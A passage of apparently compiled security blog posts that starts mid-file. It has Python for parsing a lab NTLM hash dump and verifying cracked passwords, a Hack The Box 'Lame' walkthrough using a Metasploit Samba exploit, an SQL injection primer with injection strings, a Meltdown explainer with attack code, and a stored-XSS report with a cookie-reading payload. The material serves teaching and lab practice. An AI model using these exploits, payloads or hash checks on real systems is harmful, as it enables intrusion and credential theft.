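SAMPLE_DUMP = """krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c718f548c75062ada93250db208d3178:::
Domain    User  ID  Hash
HTB.LOCAL Guest 501 -
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrb3n:1105:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
"""

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::")


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def _F(x, y, z): return (x & y) | (~x & z)
def _G(x, y, z): return (x & y) | (x & z) | (y & z)
def _H(x, y, z): return x ^ y ^ z


# (function, additive constant, per-step shifts, message-word order) for the three rounds
_ROUNDS = (
    (_F, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
    (_G, 0x5A827999, (3, 5, 9, 13), tuple((i % 4) * 4 + i // 4 for i in range(16))),
    (_H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
)


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: little-endian words, 0x80 padding, 64-bit bit-length trailer."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for f, const, shifts, order in _ROUNDS:
            for i in range(16):
                j = (-i) % 4                       # a, d, c, b are updated in turn
                x, y, z = v[(j + 1) % 4], v[(j + 2) % 4], v[(j + 3) % 4]
                v[j] = _lrot((v[j] + f(x, y, z) + X[order[i]] + const) & MASK, shifts[i % 4])
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    return md4(password.encode("utf-16-le")).hex()


def parse_dump(text: str) -> list:
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append({"user": m.group(1), "rid": int(m.group(2)),
                            "lm": m.group(3).lower(), "nt": m.group(4).lower()})
    return entries


def shared_nt_hashes(entries: list) -> dict:
    """NT hash -> users that share it; identical NT hashes mean identical passwords."""
    by_hash = defaultdict(list)
    for e in entries:
        by_hash[e["nt"]].append(e["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def verify_candidate(entries: list, user: str, candidate: str) -> bool:
    """Check a cracked password against the stored NT hash without a cracking tool."""
    nt = next(e["nt"] for e in entries if e["user"].lower() == user.lower())
    return nt_hash(candidate) == nt


if __name__ == "__main__":
    dump = parse_dump(SAMPLE_DUMP)
    print("LM disabled for all accounts:", all(e["lm"] == EMPTY_LM for e in dump))
    for h, users in shared_nt_hashes(dump).items():
        print(f"shared NT hash {h}: {', '.join(users)}")
    print("mrlky / Football#7 matches:", verify_candidate(dump, "mrlky", "Football#7"))
```

Two things worth noticing in this dump before reaching for a cracker: the NT hash is unsalted, so two accounts with the same hash have the same password and one crack covers both, and the LM field being aad3b4…ee everywhere means there is no weak LM hash to attack, so the cracking effort is against MD4 of the real password.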

HTB Machine Walkthrough – Lame

#########################################################################
# Lame - Linux Os
# Date: 26.07.2019
# Walkthrough Author: Sayan Chatterjee

#########################################################################

Please follow the below commands to get the user.txt and root.txt :
  1. Perform nmap scan on 10.10.10.3
    • Command : nmap -sC -sV -oA Lame 10.10.10.3
    • Output :

# Nmap 7.70 scan initiated Thu Jul 25 11:35:11 2019 as: nmap -sC -sV -oA Lame 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.12
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 – secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2d23h04m02s, deviation: 0s, median: -2d23h04m02s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2019-07-22T08:31:33-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 25 11:36:15 2019 — 1 IP address (1 host up) scanned in 63.87 seconds

2. Port 21: Check the FTP connection with the anonymous account. It works, but you will not get any sensitive info for enumeration.

3. Port 22: Check the SSH connection with default user/user; it will not work and will ask for a correct password.

4. Ports 139, 445: Samba smbd 3.X - 4.X, reported more precisely as 3.0.20-Debian on 445. Check whether an exploit is available for that Samba version.

How to check?

Google the exact version string. For this one, refer to https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script (the "username map script" command execution in Samba 3.0.20 through 3.0.25rc3, CVE-2007-2447).

Steps to Exploit :
  1. Open a terminal.
  2. Type msfconsole (starting Metasploit).
  3. Next follow these steps:
    • msf > search samba
    • msf > use exploit/multi/samba/usermap_script
    • msf exploit(usermap_script) > show options

      ...show and set options...
    • msf exploit(usermap_script) > set RHOSTS <LameIp>
    • msf exploit(usermap_script) > exploit
  4. You get a shell as root straight away (the injected command runs with smbd's privileges, which are root), so there is no separate privilege-escalation step.
  5. Check pwd and do ls.
  6. Look for the home and root directories.
  7. Inside the 'home' directory -> inside the 'makis' directory -> get the user.txt flag.
  8. Inside the 'root' directory -> get the root.txt flag.

###########################################################################

SQL Injection Fundamentals

Definition :

SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application’s database server (also commonly referred to as a Relational Database Management System – RDBMS).

Types of SQL Injection (SQLi)

SQL Injection can be classified into three major categories –

  1. In-band SQLi
  2. Inferential SQLi
  3. Out-of-band SQLi

1. In-band SQLi :

In-band SQL Injection is the most common and easiest-to-exploit type of SQL Injection attack. In-band SQL Injection occurs when an attacker is able to use the same communication channel to both launch the attack and gather results.

The two most common types of in-band SQL Injection are Error-based SQLi and Union-based SQLi.

  • Error-based SQLi

Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database. While errors are very useful during the development phase of a web application, they should be disabled on a live site, or logged to a file with restricted access instead.

  • Union-based SQLi

Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response.

2. Inferential SQLi (Blind SQLi) :

Inferential SQL Injection, unlike in-band SQLi, may take longer for an attacker to exploit, however, it is just as dangerous as any other form of SQL Injection. In an inferential SQLi attack, no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band (which is why such attacks are commonly referred to as “blind SQL Injection attacks”). Instead, an attacker is able to reconstruct the database structure by sending payloads, observing the web application’s response and the resulting behavior of the database server.

The two types of inferential SQL Injection are Boolean-based Blind SQLi and Time-based Blind SQLi.

  • Boolean-based (content-based) Blind SQLi

Boolean-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.

Depending on the result, the content within the HTTP response will change, or remain the same. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned. This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database, character by character.

  • Time-based Blind SQLi

Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE.

Depending on the result, an HTTP response will be returned with a delay, or returned immediately. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned. This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database character by character.

3. Out-of-band SQLi

Out-of-band SQL Injection is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL Injection occurs when an attacker is unable to use the same channel to launch the attack and gather results.

Out-of-band techniques offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an inferential time-based attack unreliable).

Out-of-band SQLi techniques rely on the database server’s ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Server’s xp_dirtree command, which can be used to make DNS requests to a server an attacker controls, as well as Oracle Database’s UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls.
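An added example (not from the original post) showing, in sqlite3, why the in-band and inferential classes above exist at all: one lookup built by string concatenation beside its parameterised form, plus two regression checks that report whether a lookup still behaves as a boolean oracle (rows vs no rows tracking a TRUE/FALSE condition) or as a UNION channel. The users table and names are constructed sample data.

```python
import sqlite3


def make_sample_db():
    """Constructed in-memory user store standing in for a web app's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (name, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user")])
    return conn


def lookup_vulnerable(conn, name):
    # The input is spliced into the SQL text, so a quote character in it ends
    # the string literal and the rest is parsed as SQL (the root cause of
    # every SQLi class described above).
    sql = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    # Bound parameter: the value travels separately from the statement, so
    # the same input is only ever compared as a (non-matching) name.
    sql = "SELECT name, role FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def acts_as_boolean_oracle(lookup, conn):
    """Boolean-based blind regression check: does the response (rows vs no
    rows) track a TRUE/FALSE condition supplied in the input? A correct
    lookup returns no rows for both probes, so the check yields False."""
    true_rows = lookup(conn, "bob' AND '1'='1")
    false_rows = lookup(conn, "bob' AND '1'='2")
    return bool(true_rows) and not false_rows


def acts_as_union_channel(lookup, conn):
    """Union-based regression check: can the input append a second SELECT
    whose rows come back in the same response?"""
    rows = lookup(conn, "x' UNION SELECT name, role FROM users WHERE '1'='1")
    return len(rows) >= 2


if __name__ == "__main__":
    db = make_sample_db()
    for fn in (lookup_vulnerable, lookup_safe):
        print(fn.__name__, "boolean oracle:", acts_as_boolean_oracle(fn, db),
              "union channel:", acts_as_union_channel(fn, db))
```

The same two checks can be pointed at any lookup function in a code base as a unit test: a parameterised implementation passes both, a concatenating one fails both.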

Oops !! WTF is the Meltdown & Spectre Vulnerability?

Meltdown is a cache-timing attack on Intel CPUs that allows all memory to be read by any process because of how they do Speculative Execution. If that sounds like a handful, we wrote this blog for you!

This post includes everything you must know before you can understand Meltdown as a developer (it assumes no knowledge of CPU internals). I highly recommend reading the original paper alongside this from https://meltdownattack.com/meltdown.pdf, I found it to be very readable and extremely well written.

Out of Order / Speculative Execution

Modern CPUs do out-of-order execution whenever they see a branch (if/switch, etc.). They will typically execute code for multiple branches while the conditional is evaluated. So

  if (a+b*c == d)
  {
    // first branch
  }
  else {
    // second branch
  }

will involve both branches running simultaneously while the condition is evaluated. Once the CPU has the answer (say “true”), it scraps the work from the second branch and commits the first branch. The instructions that are executed out-of-order are called “transient instructions” until they are committed.

The Bug

The code in both the branches can do a lot of things. The assumption is that all of these things will be rolled back once a branch is picked. The attack is possible because cache-state is something that does not seem to be rolled back. This is the crux behind both Meltdown and Spectre attacks.

Meltdown specifically works because “any-random-memory-access” seems to work while in a transient instruction. This attack allows a program to access the memory, and thus also the secrets, of other programs and the operating system.

CPU Cache?

Reading data from RAM is slow when you are a CPU. CPU cache access times are on the order of 1-10ns, while a RAM access takes >100ns. Almost any memory read/write is placed in the cache: the cache is a mirror image of memory activity on the computer.

Cache Timing?

Let us say I have this piece of code:

  $secrets = ["secret1", "secret2", "secret3", "secret4", "realSecret"];
  $realSecret = $secrets[4];

This loads the real secret into memory. An attacker then does the following:

  1. Clears the CPU cache
  2. Runs the above program
  3. Tries to access the specific memory address

The above access results in an error and raises an exception. However, the attacker knows that the secret is in one of the 5 possible locations. Since only one of these is ever read by the actual program, the attacker can repeatedly run the program and time the exception to figure out which of the locations was being read. The one that is read is cached, so the exception will be raised much faster as a result.

Cache Timing attacks are the building blocks of Meltdown, which uses them as a side channel to leak data.

The Bug, again

Now that we’ve explained cache-timing attacks (which can tell you “what-memory” is being used by another program), we can get back to Meltdown. Meltdown happens because:

  • CPUs do not roll back the CPU cache after speculative execution, and
  • You can manipulate the cache in those transient instructions to create a “side-channel” and
  • Intel CPUs allow you to read memory from other processes while in a transient instruction.

From the paper:

Meltdown consists of 3 steps:

Step 1. The content of an attacker-chosen memory location, which is inaccessible to the attacker, is loaded into a register.

Step 2. A transient instruction accesses a cache line based on the secret content of the register.

Step 3. The attacker uses Flush+Reload to determine the accessed cache line and hence the secret stored at the chosen memory location.

In slightly simpler words:

  1. Read an inaccessible memory address (this will raise an exception, but we’ll work later on suppressing it)
  2. Depending on the value of the byte at the read address, read a specific value from a known memory location. Do this before the exception is raised, relying on Speculative Execution.
  3. Use a cache-timing attack to see what value was read in step 2, and use that to infer the value you wanted to read

The trick is in executing step 2 as a transient instruction, which lets us read any memory address, even from another process.

In code:

  c = *kernel_memory_address;
  b = probe[c];

There are several caveats:

Exception Suppressing

If you try to actually read kernel-space memory directly, your program will crash. Meltdown works around this by making sure that the memory is only read in transient instructions that will be rolled back.

So you wrap the above code with:

  if (check_function()) {
    meltdown();
  }

and make sure that check_function always returns false. What happens is that the CPU starts running the code inside the meltdown function before it has the result from the check.

Cache Lines

CPU caches are broken down into several cache lines. Think of them as lookup hashes for your CPU cache. Instead of accessing a single byte (probe[c]), Meltdown multiplies the memory address by 4096 to make sure that the code accesses a specific cache line. So, more like:

  b = probe[c * 4096];

If you’re wondering why we are doing a read instead of just printing c, or maybe copying it to another place, it is because CPU designers considered that and roll back those instructions correctly, so writes cannot be used to exfiltrate data from a transient instruction.

Zeroes

Sometimes the exception is raised before the code executes, and the value of c is set to 0 as part of the rollback. This makes the attack unreliable. So the attack decides to ignore zero-value reads and only prime the cache if it reads a non-zero value. Thus the whole code becomes:

  if (check_function()) {
  retry:
    c = *kernel_memory_address;
    if (c != 0)
      b = probe[c * 4096];
    else
      goto retry;
  }

The equivalent assembly code (from the paper) is:

  ; rcx = kernel address
  ; rbx = probe array
  retry:
  mov al, byte [rcx]         ; try to read rcx
  shl rax, 0xc               ; multiply the read value by 4096 by shifting left 12 (0xc) bits
  jz retry                   ; retry if the above is zero
  mov rbx, qword [rbx + rax] ; read specific entry in rbx

The special condition where c actually is zero is handled in the cache-timing where we notice no memory address has been cached and decide it was a zero.
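As an added, defender-side example that is not part of the original post: on Linux the kernel reports its own Meltdown/Spectre status under /sys/devices/system/cpu/vulnerabilities, one file per issue, with a line such as "Not affected", "Vulnerable" or "Mitigation: PTI". This script classifies those lines and lists the issues still needing attention; the two host reports at the bottom are constructed samples, not captures.

```python
import os

# Linux kernel sysfs interface (4.15 and later): one file per issue, each
# holding a line such as "Not affected", "Vulnerable" or "Mitigation: PTI".
VULN_DIR = "/sys/devices/system/cpu/vulnerabilities"


def classify_status(line):
    """Map one status line to not_affected / mitigated / vulnerable / unknown."""
    text = line.strip()
    if text.startswith("Not affected"):
        return "not_affected"
    if text.startswith("Mitigation:"):
        return "mitigated"
    if text.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"  # empty file or a format this script does not recognise


def needs_attention(statuses):
    """statuses: {issue_name: status_line}. Returns the issues that are still
    vulnerable or could not be classified, sorted for stable reporting."""
    return sorted(name for name, line in statuses.items()
                  if classify_status(line) in ("vulnerable", "unknown"))


def read_sysfs(directory=VULN_DIR):
    """Collect every status file; returns {} on hosts without the interface."""
    statuses = {}
    if not os.path.isdir(directory):
        return statuses
    for name in sorted(os.listdir(directory)):
        with open(os.path.join(directory, name)) as fh:
            statuses[name] = fh.read()
    return statuses


# Constructed sample reports (not real captures) for the checks below.
SAMPLE_PATCHED = {
    "meltdown": "Mitigation: PTI\n",
    "spectre_v1": "Mitigation: __user pointer sanitization\n",
    "spectre_v2": "Mitigation: Full generic retpoline\n",
}
SAMPLE_UNPATCHED = {
    "meltdown": "Vulnerable\n",
    "spectre_v1": "Vulnerable\n",
    "spectre_v2": "Mitigation: Full generic retpoline\n",
}

if __name__ == "__main__":
    live = read_sysfs() or SAMPLE_UNPATCHED  # falls back to the sample off-Linux
    print("needs attention:", needs_attention(live))
```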


Website Broker Script – Stored XSS

############################################################################
# Exploit Title: Website Broker Script – Stored XSS
# Date: 11.02.2018
# Exploit Author: Sayan Chatterjee
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/website-broker-script/
# Category: Web Application
# Version: 3.0.6
# Tested on: Windows 10
# CVE: CVE-2018-6900
############################################################################


Proof of Concept
=================
URL: https://www.phpscriptsmall.com/product/website-broker-script/
Attack Vector : Last Name
Payload : <svg/onload=alert(document.cookie)>

Reproduction Steps:
——————————
1. Access the above URL
2. Click on “User Demo”
3. The application will be redirected to http://74.124.215.220/~clienemo/prabha/flippa-clone/
4. Go to “Register” and create a new user
5. Now log in to the application and click on “My Account”
6. Click on “Edit Profile” -> select the “Last Name” field and inject <svg/onload=alert(document.cookie)>
7. The persistent XSS will be executed.